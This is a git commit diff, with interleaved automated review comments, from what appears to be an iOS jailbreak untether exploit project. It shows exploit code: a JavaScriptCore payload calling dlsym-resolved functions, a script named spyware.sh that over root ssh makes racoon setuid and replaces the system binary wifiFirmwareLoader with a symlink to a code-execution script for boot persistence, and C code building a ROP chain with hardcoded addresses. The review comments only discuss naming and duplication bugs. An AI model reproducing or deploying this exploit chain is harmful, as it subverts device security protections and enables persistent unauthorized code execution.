authorspv <aquaticvegetable@gmail.com>2022-04-20 19:44:01 -0400
committerspv <aquaticvegetable@gmail.com>2022-04-20 19:44:01 -0400
commit64ef7cbaf51af9a60c19ff28c8cb5537c8134454 (patch)
treee177ac42e5ad69c53ed8460458892313f489814b
parentf92ed682982d7fa7d1afe2e61aefd42050649ea8 (diff)
wip
-rw-r--r--js/main.js4
-rwxr-xr-xspyware.sh8
-rw-r--r--src/main.c94
3 files changed, 41 insertions, 65 deletions
diff --git a/js/main.js b/js/main.js
index 7a4a449..efb1f5f 100644
--- a/js/main.js
+++ b/js/main.js
@@ -49,7 +49,7 @@ function main() {
var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
var shc_slide = read_u32(0x1a0000 + 20 + slid);
- write_str(0x148000, "get rekt from jsc %d\0");
+ write_str(0x148000, "get rekt from jsc %d (slide=%x)\0");
write_str(0x149000, "syslog\0");
write_str(0x14a000, "sleep\0");
// while (true) {
@@ -59,7 +59,7 @@ function main() {
var i = 0;
while (true) {
- call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, 0x3);
+ call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
i++;
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
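Review bot: The new call on line 32 passes `slide` as its last argument, but the only slide-related name visible in this function is `slid` (lines 21–22); if `slide` is not declared elsewhere in main(), the loop body throws a ReferenceError on its first iteration instead of logging anything. Either the intended identifier is `slid`, or `slide` deserves a comment at its declaration site saying where it is assigned, since neither hunk shows it. The format string changed on line 24 now has two conversions (`%d` and `%x`) and the call supplies `i` and `slide`, so the argument count is consistent once the name question is settled. main()'s body starts and ends outside these hunks.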
diff --git a/spyware.sh b/spyware.sh
index fb79486..dac5939 100755
--- a/spyware.sh
+++ b/spyware.sh
@@ -3,7 +3,7 @@
ssh root@localhost -p 2222 << EOF
rm -rf /untether/
mkdir /untether/
-echo "#!/usr/local/bin/scripter -q -cf" > /untether/get_code_exec
+echo "#!/usr/local/bin/scripter_ -q -cf" > /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
@@ -32,8 +32,8 @@ echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/untether/get_code_exec\");" >> /untether/get_code_exec
chmod +x /untether/get_code_exec
mkdir /usr/local/bin/
-cp -p /usr/libexec/dhcpd /usr/local/bin/scripter
+cp -p /usr/libexec/dhcpd /usr/local/bin/scripter_
chmod 4777 /usr/sbin/racoon
-mv /usr/sbin/BTServer /usr/sbin/BTServer_
-ln -s /untether/get_code_exec /usr/sbin/BTServer
+mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_
+ln -s /untether/get_code_exec /usr/libexec/wifiFirmwareLoader
EOF \ No newline at end of file
diff --git a/src/main.c b/src/main.c
index 218f6ea..c3df450 100644
--- a/src/main.c
+++ b/src/main.c
@@ -176,7 +176,8 @@ int main(int argc,
// uint32_t stack_base = 0x1c7738; // my shell setup
// uint32_t stack_base = 0x1c7c88; // my 4s shell setup
// uint32_t stack_base = 0x1c2e48; // my lldb
- uint32_t stack_base = 0x1c7d68; // btserver env
+// uint32_t stack_base = 0x1c7d68; // btserver env
+ uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env
uint32_t magic_trigger_addr = 0xb6074;
uint32_t mov_r0_0_bx_lr = 0x8d3e | 1;
@@ -297,6 +298,39 @@ int main(int argc,
write32_unslid(0x41414141,
0x42424242));
#endif
+
+ fprintf(fp,
+ "%s",
+ writebuf_unslid(0x108000,
+ "var parent = new Uint8Array(0x100);"
+ "var child = new Uint8Array(0x100);"
+ " var fuck = new Array();"
+ " for (var i = 0; i < 0x200000; i++) {"
+ " fuck[i] = i;"
+ " }"
+ " delete fuck;"
+ ""
+ "//shitalloc();",
+ strlen("var parent = new Uint8Array(0x100);"
+ "var child = new Uint8Array(0x100);"
+ " var fuck = new Array();"
+ " for (var i = 0; i < 0x200000; i++) {"
+ " fuck[i] = i;"
+ " }"
+ " delete fuck;"
+ ""
+ "//shitalloc();") + 1));
+ fprintf(fp,
+ "%s",
+ writebuf_unslid(0x10a000,
+ js_src,
+ strlen(js_src) + 1));
+
+ fprintf(fp,
+ "%s",
+ writebuf_unslid(0x109000,
+ "still alive\n",
+ strlen("still alive\n") + 1));
for (int slide = 0x1; slide <= 0x3; slide++) {
uint32_t base = slide << 12;
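Review bot: The JavaScript prelude written at 0x108000 is spelled out twice, once as the buffer argument and again inside `strlen(...)` (lines 82–99), so the two copies can silently drift apart — this very commit had to edit the loop bound from 0x800000 to 0x200000 in both places. Hoist the literal into a single `static const char js_prelude[] = "…";` above this block and call `writebuf_unslid(0x108000, js_prelude, sizeof js_prelude)`; `sizeof` on a string literal array already counts the terminating NUL, so it equals the old `strlen(...) + 1`. The three writes were moved ahead of the `slide` loop without a comment; since they use fixed addresses rather than `base`, a one-liner such as `/* fixed-address writes: do not depend on the per-slide base, so emitted once */` would record the reason, and the 0x800000→0x200000 change is likewise undocumented. main() begins and ends outside this hunk.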
@@ -320,30 +354,6 @@ int main(int argc,
"[*] malloc(...)\t\t\t= %p\n",
strlen("[*] malloc(...)\t\t\t= %p\n") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + dyld_status_addr,
- "[*] dyld_base\t\t\t= %p\n",
- strlen("[*] dyld_base\t\t\t= %p\n") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + dyld_status2_addr,
- "[*] *(uint32_t*)dyld_base\t= %p\n",
- strlen("[*] *(uint32_t*)dyld_base\t= %p\n") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + jsc_addr,
- "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore",
- strlen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + dlopen_status_addr,
- "[*] dlopen(JavaScriptCore)\t= %p\n",
- strlen("[*] dlopen(JavaScriptCore)\t= %p\n") + 1));
fprintf(fp,
"%s",
writebuf_unslid(base + dyld_shc_status_addr,
@@ -359,40 +369,6 @@ int main(int argc,
writebuf_unslid(base + arg_addr,
"/untether/p0laris",
strlen("/untether/p0laris") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(0x108000,
- "var parent = new Uint8Array(0x100);"
- "var child = new Uint8Array(0x100);"
- " var fuck = new Array();"
- " for (var i = 0; i < 0x800000; i++) {"
- " fuck[i] = i;"
- " }"
- " delete fuck;"
- ""
- "//shitalloc();",
- strlen("var parent = new Uint8Array(0x100);"
- "var child = new Uint8Array(0x100);"
- " var fuck = new Array();"
- " for (var i = 0; i < 0x800000; i++) {"
- " fuck[i] = i;"
- " }"
- " delete fuck;"
- ""
- "//shitalloc();") + 1));
- fprintf(fp,
- "%s",
- writebuf_unslid(0x10a000,
- js_src,
- strlen(js_src) + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(0x109000,
- "still alive\n",
- strlen("still alive\n") + 1));
-
rop_chain_shit chain_b0i = gen_rop_chain(base,
we_out_here_addr,